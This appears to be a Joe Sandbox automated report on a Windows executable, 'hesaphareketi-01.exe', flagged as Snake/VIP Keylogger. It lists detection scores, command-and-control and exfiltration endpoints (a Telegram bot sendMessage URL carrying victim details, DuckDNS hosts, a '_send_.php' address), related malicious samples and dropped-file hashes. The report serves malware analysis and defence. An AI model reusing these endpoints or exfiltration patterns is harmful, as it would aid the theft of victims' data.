Internet

Source	Detection	Scanner	Link
hesaphareketi-01.exe	24%	ReversingLabs
hesaphareketi-01.exe	61%	Virustotal	Browse
hesaphareketi-01.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Link
reallyfreegeoip.org	0%	Virustotal	Browse
mail.obaambalaj.com.tr	0%	Virustotal	Browse
api.telegram.org	2%	Virustotal	Browse
checkip.dyndns.com	0%	Virustotal	Browse
checkip.dyndns.org	0%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label	Link
https://duckduckgo.com/chrome_newtab	0%	URL Reputation	safe
https://duckduckgo.com/chrome_newtab	0%	URL Reputation	safe
https://duckduckgo.com/ac/?q=	0%	URL Reputation	safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	URL Reputation	safe
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	0%	URL Reputation	safe
https://reallyfreegeoip.org/xml/8.46.123.33	0%	URL Reputation	safe
https://www.ecosia.org/newtab/	0%	URL Reputation	safe
http://varders.kozow.com:8081	0%	URL Reputation	safe
http://aborters.duckdns.org:8081	100%	URL Reputation	malware
https://ac.ecosia.org/autocomplete?q=	0%	URL Reputation	safe
http://checkip.dyndns.org/	0%	URL Reputation	safe
http://51.38.247.67:8081/_send_.php?L	0%	URL Reputation	safe
https://reallyfreegeoip.org/xml/8.46.123.33$	0%	URL Reputation	safe
http://anotherarmy.dns.army:8081	100%	URL Reputation	malware
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	0%	URL Reputation	safe
http://checkip.dyndns.org/q	0%	URL Reputation	safe
https://reallyfreegeoip.org	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	0%	URL Reputation	safe
http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded	0%	URL Reputation	safe
https://reallyfreegeoip.org/xml/	0%	URL Reputation	safe
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	0%	Virustotal		Browse
https://api.telegram.org	1%	Virustotal		Browse
https://www.office.com/	0%	Virustotal		Browse
http://mail.obaambalaj.com.tr	0%	Virustotal		Browse
https://chrome.google.com/webstore?hl=en	0%	Virustotal		Browse
https://www.office.com/lB	0%	Virustotal		Browse
https://api.telegram.org/bot/sendMessage?chat_id=&text=	2%	Virustotal		Browse
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:581804%0D%0ADate%20a	0%	Virustotal		Browse
https://api.telegram.org/bot	3%	Virustotal		Browse
https://www.office.com/(	0%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
reallyfreegeoip.org	188.114.96.3	true	true	0%, Virustotal, Browse	unknown
mail.obaambalaj.com.tr	77.245.159.27	true	true	0%, Virustotal, Browse	unknown
api.telegram.org	149.154.167.220	true	true	2%, Virustotal, Browse	unknown
checkip.dyndns.com	193.122.6.168	true	false	0%, Virustotal, Browse	unknown
checkip.dyndns.org	unknown	unknown	true	0%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:581804%0D%0ADate%20and%20Time:%2003/10/2024%20/%2019:12:44%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20581804%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D	false		unknown
https://reallyfreegeoip.org/xml/8.46.123.33	false	URL Reputation: safe	unknown
http://checkip.dyndns.org/	false	URL Reputation: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://www.office.com/	hesaphareketi-01.exe, 00000004.00000002.3895077200.0000000002ECA000.00000004.00000800.00020000.00000000.sdmp, hesaphareketi-01.exe, 00000004.00000002.3895077200.0000000002EBB000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://duckduckgo.com/chrome_newtab	hesaphareketi-01.exe, 00000004.00000002.3897670994.0000000003FDF000.00000004.00000800.00020000.00000000.sdmp, hesaphareketi-01.exe, 00000004.00000002.3897670994.0000000003FC4000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe URL Reputation: safe	unknown
https://duckduckgo.com/ac/?q=	hesaphareketi-01.exe, 00000004.00000002.3897670994.0000000003FDF000.00000004.00000800.00020000.00000000.sdmp, hesaphareketi-01.exe, 00000004.00000002.3897670994.0000000003FC4000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.telegram.org	hesaphareketi-01.exe, 00000004.00000002.3895077200.0000000002E04000.00000004.00000800.00020000.00000000.sdmp	false	1%, Virustotal, Browse	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	hesaphareketi-01.exe, 00000004.00000002.3897670994.0000000003FDF000.00000004.00000800.00020000.00000000.sdmp, hesaphareketi-01.exe, 00000004.00000002.3897670994.0000000003FC4000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://api.telegram.org/bot	hesaphareketi-01.exe, 00000000.00000002.1458561793.00000000046EA000.00000004.00000800.00020000.00000000.sdmp, hesaphareketi-01.exe, 00000004.00000002.3895077200.0000000002E04000.00000004.00000800.00020000.00000000.sdmp, hesaphareketi-01.exe, 00000004.00000002.3893452216.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false	3%, Virustotal, Browse	unknown
https://www.office.com/lB	hesaphareketi-01.exe, 00000004.00000002.3895077200.0000000002EC5000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	hesaphareketi-01.exe, 00000004.00000002.3897670994.0000000003FDF000.00000004.00000800.00020000.00000000.sdmp, hesaphareketi-01.exe, 00000004.00000002.3897670994.0000000003FC4000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	hesaphareketi-01.exe, 00000004.00000002.3897670994.0000000003FDF000.00000004.00000800.00020000.00000000.sdmp, hesaphareketi-01.exe, 00000004.00000002.3897670994.0000000003FC4000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=	hesaphareketi-01.exe, 00000004.00000002.3895077200.0000000002E04000.00000004.00000800.00020000.00000000.sdmp	false	2%, Virustotal, Browse	unknown
https://chrome.google.com/webstore?hl=en	hesaphareketi-01.exe, 00000004.00000002.3895077200.0000000002E27000.00000004.00000800.00020000.00000000.sdmp, hesaphareketi-01.exe, 00000004.00000002.3895077200.0000000002ECA000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://www.ecosia.org/newtab/	hesaphareketi-01.exe, 00000004.00000002.3897670994.0000000003FDF000.00000004.00000800.00020000.00000000.sdmp, hesaphareketi-01.exe, 00000004.00000002.3897670994.0000000003FC4000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://varders.kozow.com:8081	hesaphareketi-01.exe, 00000000.00000002.1458561793.00000000046EA000.00000004.00000800.00020000.00000000.sdmp, hesaphareketi-01.exe, 00000004.00000002.3893452216.0000000000402000.00000040.00000400.00020000.00000000.sdmp, hesaphareketi-01.exe, 00000004.00000002.3895077200.0000000002D21000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://aborters.duckdns.org:8081	hesaphareketi-01.exe, 00000000.00000002.1458561793.00000000046EA000.00000004.00000800.00020000.00000000.sdmp, hesaphareketi-01.exe, 00000004.00000002.3893452216.0000000000402000.00000040.00000400.00020000.00000000.sdmp, hesaphareketi-01.exe, 00000004.00000002.3895077200.0000000002D21000.00000004.00000800.00020000.00000000.sdmp	true	URL Reputation: malware	unknown
https://ac.ecosia.org/autocomplete?q=	hesaphareketi-01.exe, 00000004.00000002.3897670994.0000000003FDF000.00000004.00000800.00020000.00000000.sdmp, hesaphareketi-01.exe, 00000004.00000002.3897670994.0000000003FC4000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://51.38.247.67:8081/_send_.php?L	hesaphareketi-01.exe, 00000004.00000002.3895077200.0000000002E74000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://reallyfreegeoip.org/xml/8.46.123.33$	hesaphareketi-01.exe, 00000004.00000002.3895077200.0000000002E04000.00000004.00000800.00020000.00000000.sdmp, hesaphareketi-01.exe, 00000004.00000002.3895077200.0000000002D99000.00000004.00000800.00020000.00000000.sdmp, hesaphareketi-01.exe, 00000004.00000002.3895077200.0000000002DDE000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://mail.obaambalaj.com.tr	hesaphareketi-01.exe, 00000004.00000002.3895077200.0000000002E74000.00000004.00000800.00020000.00000000.sdmp, hesaphareketi-01.exe, 00000004.00000002.3895077200.0000000002E8C000.00000004.00000800.00020000.00000000.sdmp, hesaphareketi-01.exe, 00000004.00000002.3895077200.0000000002E84000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
http://anotherarmy.dns.army:8081	hesaphareketi-01.exe, 00000000.00000002.1458561793.00000000046EA000.00000004.00000800.00020000.00000000.sdmp, hesaphareketi-01.exe, 00000004.00000002.3893452216.0000000000402000.00000040.00000400.00020000.00000000.sdmp, hesaphareketi-01.exe, 00000004.00000002.3895077200.0000000002D21000.00000004.00000800.00020000.00000000.sdmp	true	URL Reputation: malware	unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	hesaphareketi-01.exe, 00000004.00000002.3897670994.0000000003FDF000.00000004.00000800.00020000.00000000.sdmp, hesaphareketi-01.exe, 00000004.00000002.3897670994.0000000003FC4000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://checkip.dyndns.org/q	hesaphareketi-01.exe, 00000000.00000002.1458561793.00000000046EA000.00000004.00000800.00020000.00000000.sdmp, hesaphareketi-01.exe, 00000004.00000002.3893452216.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://reallyfreegeoip.org	hesaphareketi-01.exe, 00000004.00000002.3895077200.0000000002E04000.00000004.00000800.00020000.00000000.sdmp, hesaphareketi-01.exe, 00000004.00000002.3895077200.0000000002D6F000.00000004.00000800.00020000.00000000.sdmp, hesaphareketi-01.exe, 00000004.00000002.3895077200.0000000002DDE000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.office.com/(	hesaphareketi-01.exe, 00000004.00000002.3895077200.0000000002EBB000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	hesaphareketi-01.exe, 00000000.00000002.1457581741.0000000002ED2000.00000004.00000800.00020000.00000000.sdmp, hesaphareketi-01.exe, 00000004.00000002.3895077200.0000000002D21000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	hesaphareketi-01.exe, 00000004.00000002.3897670994.0000000003FDF000.00000004.00000800.00020000.00000000.sdmp, hesaphareketi-01.exe, 00000004.00000002.3897670994.0000000003FC4000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded	hesaphareketi-01.exe, 00000000.00000002.1458561793.00000000046EA000.00000004.00000800.00020000.00000000.sdmp, hesaphareketi-01.exe, 00000004.00000002.3893452216.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:581804%0D%0ADate%20a	hesaphareketi-01.exe, 00000004.00000002.3895077200.0000000002E04000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://reallyfreegeoip.org/xml/	hesaphareketi-01.exe, 00000000.00000002.1458561793.00000000046EA000.00000004.00000800.00020000.00000000.sdmp, hesaphareketi-01.exe, 00000004.00000002.3893452216.0000000000402000.00000040.00000400.00020000.00000000.sdmp, hesaphareketi-01.exe, 00000004.00000002.3895077200.0000000002D6F000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
77.245.159.27	mail.obaambalaj.com.tr	Turkey	42868	NIOBEBILISIMHIZMETLERITR	true
149.154.167.220	api.telegram.org	United Kingdom	62041	TELEGRAMRU	true
193.122.6.168	checkip.dyndns.com	United States	31898	ORACLE-BMC-31898US	false
188.114.96.3	reallyfreegeoip.org	European Union	13335	CLOUDFLARENETUS	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1524785
Start date and time:	2024-10-03 09:10:14 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 34s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	11
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	hesaphareketi-01.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@7/6@4/4
EGA Information:	Successful, ratio: 50%
HCA Information:	Successful, ratio: 100% Number of executed functions: 119 Number of non-executed functions: 13
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target hesaphareketi-01.exe, PID 5508 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
03:11:17	API Interceptor	10333676x Sleep call for process: hesaphareketi-01.exe modified
03:11:19	API Interceptor	22x Sleep call for process: powershell.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
149.154.167.220	T3xpD9ZaYu.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	SCANNED COPY.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	doc_20241002_383767466374663543.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	AvQTFKdsST.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	All#att098764576.exe	Get hash	malicious	Snake Keylogger	Browse
	hesaphareketi-01.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	zR0pDxPfkZ.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	WaUjTT0Wa1.exe	Get hash	malicious	VIP Keylogger	Browse
	OXrZ6fj4Hq.exe	Get hash	malicious	Neshta, Oski Stealer, StormKitty, SugarDump, Vidar, XWorm	Browse
	hesaphareketi-01.bat.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
193.122.6.168	Athnaton_ANP00224_Specification.xls	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	IEnetbookupdation.hta	Get hash	malicious	Cobalt Strike, Snake Keylogger	Browse	checkip.dyndns.org/
	SCANNED COPY.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	All#att098764576.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	WIpGif4IRrFfamQ.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	CANADAXORDER.xls	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	RFQ-00032035.pdf.scr.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	Italya301 Kurumlu projesi_SLG620-50mm%0190%_ img .exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	SYSN ORDER.xls	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	SecuriteInfo.com.Trojan.PackedNET.3066.19627.4428.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
reallyfreegeoip.org	Athnaton_ANP00224_Specification.xls	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	dllhost.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	IEnetbookupdation.hta	Get hash	malicious	Cobalt Strike, Snake Keylogger	Browse	188.114.96.3
	SCANNED COPY.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	Price Request 02.10.24.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	doc_20241002_383767466374663543.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	All#att098764576.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	hesaphareketi-01.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	zR0pDxPfkZ.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	WaUjTT0Wa1.exe	Get hash	malicious	VIP Keylogger	Browse	188.114.97.3
checkip.dyndns.com	QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	158.101.44.242
	Athnaton_ANP00224_Specification.xls	Get hash	malicious	Snake Keylogger	Browse	132.226.8.169
	dllhost.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	IEnetbookupdation.hta	Get hash	malicious	Cobalt Strike, Snake Keylogger	Browse	193.122.6.168
	SCANNED COPY.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.8.169
	Price Request 02.10.24.exe	Get hash	malicious	Snake Keylogger	Browse	158.101.44.242
	doc_20241002_383767466374663543.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	All#att098764576.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.6.168
	hesaphareketi-01.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.130.0
	zR0pDxPfkZ.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
api.telegram.org	T3xpD9ZaYu.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	149.154.167.220
	SCANNED COPY.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	doc_20241002_383767466374663543.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	AvQTFKdsST.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	149.154.167.220
	All#att098764576.exe	Get hash	malicious	Snake Keylogger	Browse	149.154.167.220
	hesaphareketi-01.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	zR0pDxPfkZ.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	WaUjTT0Wa1.exe	Get hash	malicious	VIP Keylogger	Browse	149.154.167.220
	OXrZ6fj4Hq.exe	Get hash	malicious	Neshta, Oski Stealer, StormKitty, SugarDump, Vidar, XWorm	Browse	149.154.167.220
	hesaphareketi-01.bat.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ORACLE-BMC-31898US	QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	158.101.44.242
	Athnaton_ANP00224_Specification.xls	Get hash	malicious	Snake Keylogger	Browse	158.101.44.242
	IEnetbookupdation.hta	Get hash	malicious	Cobalt Strike, Snake Keylogger	Browse	193.122.6.168
	SCANNED COPY.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
	Price Request 02.10.24.exe	Get hash	malicious	Snake Keylogger	Browse	158.101.44.242
	All#att098764576.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.6.168
	hesaphareketi-01.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.130.0
	WaUjTT0Wa1.exe	Get hash	malicious	VIP Keylogger	Browse	158.101.44.242
	po110-11#U3000Order_ROYPOWTECH %100% S51105P-E01 #Uff08#U6700#U65b0#Uff09IMG .exe	Get hash	malicious	Snake Keylogger	Browse	193.122.130.0
	zw15EB2406245 Tc ziraat bankasi. referansl#U0131 Emlakpay_323282-_563028621286 .exe	Get hash	malicious	Snake Keylogger	Browse	158.101.44.242
TELEGRAMRU	T3xpD9ZaYu.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	149.154.167.220
	tcU5sAPsAc.exe	Get hash	malicious	RedLine	Browse	149.154.167.99
	SCANNED COPY.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	doc_20241002_383767466374663543.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	AvQTFKdsST.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	149.154.167.220
	All#att098764576.exe	Get hash	malicious	Snake Keylogger	Browse	149.154.167.220
	hesaphareketi-01.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	zR0pDxPfkZ.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	WaUjTT0Wa1.exe	Get hash	malicious	VIP Keylogger	Browse	149.154.167.220
	OXrZ6fj4Hq.exe	Get hash	malicious	Neshta, Oski Stealer, StormKitty, SugarDump, Vidar, XWorm	Browse	149.154.167.220
NIOBEBILISIMHIZMETLERITR	https://timetraveltv.com/actions/cart_update.php?currency=GBP&return_url=https://blog.acelyaokcu.com/m/?c3Y9bzM2NV8xX29uZSZyYW5kPVdrcFNRMHM9JnVpZD1VU0VSMDkwOTIwMjRVMTIwOTA5MDE=N0123N%5BEMAIL	Get hash	malicious	Unknown	Browse	77.245.159.9
	PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	77.245.148.65
	Contract_Agreement_Wednesday September 2024.pdf	Get hash	malicious	Unknown	Browse	77.245.159.9
	Contract_Agreement_Tuesday September 2024.pdf	Get hash	malicious	Unknown	Browse	77.245.159.9
	https://bahrioglunakliyat.com.tr/wp-admin/admin-ajax.php	Get hash	malicious	Unknown	Browse	77.245.159.21
	SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe	Get hash	malicious	Snake Keylogger	Browse	77.245.159.7
	file.exe	Get hash	malicious	SystemBC	Browse	77.245.149.25
	#U0130#U015eLEM #U00d6ZET#U0130_G5024057699-1034 nolu TICARI.exe	Get hash	malicious	AgentTesla	Browse	77.245.148.100
	SKM_C3350i2402291223.bat.exe	Get hash	malicious	AgentTesla	Browse	77.245.148.65
	Overdue Account Notice.exe	Get hash	malicious	AgentTesla	Browse	77.245.159.10

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
54328bd36c14bd82ddaa0c04b25ed9ad	dllhost.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	IEnetbookupdation.hta	Get hash	malicious	Cobalt Strike, Snake Keylogger	Browse	188.114.96.3
	Price Request 02.10.24.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	doc_20241002_383767466374663543.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	All#att098764576.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	hesaphareketi-01.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	zR0pDxPfkZ.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	WaUjTT0Wa1.exe	Get hash	malicious	VIP Keylogger	Browse	188.114.96.3
	po110-11#U3000Order_ROYPOWTECH %100% S51105P-E01 #Uff08#U6700#U65b0#Uff09IMG .exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	#U304a#U898b#U7a4d#U308a#U4f9d#U983c.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
3b5074b1b5d032e5620f69f9f700ff0e	QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	149.154.167.220
	sostener.vbs	Get hash	malicious	Njrat	Browse	149.154.167.220
	sostener.vbs	Get hash	malicious	XWorm	Browse	149.154.167.220
	file.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	file.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	T3xpD9ZaYu.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	149.154.167.220
	file.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	file.exe	Get hash	malicious	Amadey, Credential Flusher, Stealc	Browse	149.154.167.220
	file.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	MZs41xJfcH.exe	Get hash	malicious	PureLog Stealer, Quasar, zgRAT	Browse	149.154.167.220

Process:	C:\Users\user\Desktop\hesaphareketi-01.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	1330C80CAAC9A0FB172F202485E9B1E8
SHA1:	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:	75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:	true
Reputation:	high, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	2232
Entropy (8bit):	5.379677338874509
Encrypted:	false
SSDEEP:	48:tWSU4xymI4RfoUeW+gZ9tK8NPZHUxL7u1iMuge//8PUyus:tLHxvIIwLgZ2KRHWLOug8s
MD5:	0409BC4E22C202C47D580902DAA656F4
SHA1:	FF4E4FD1293C724A149AE0A1128D7B02CEFAED17
SHA-256:	028122B959E6E45EC84CE434E2266AC3296C0ADAB2A37C391E0DEDFCA1823206
SHA-512:	6710C3E7F5822EB83F2C5228117076D73D4785AE7A7121733B5D248D9059BDDF920D750D44717B80D2E1B19E24EC276C9EFCF7DF840E3F8D73F0E1CA35C2E5E3
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	@...e.................................,..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...\|...........System.Configuration4.................%...K... 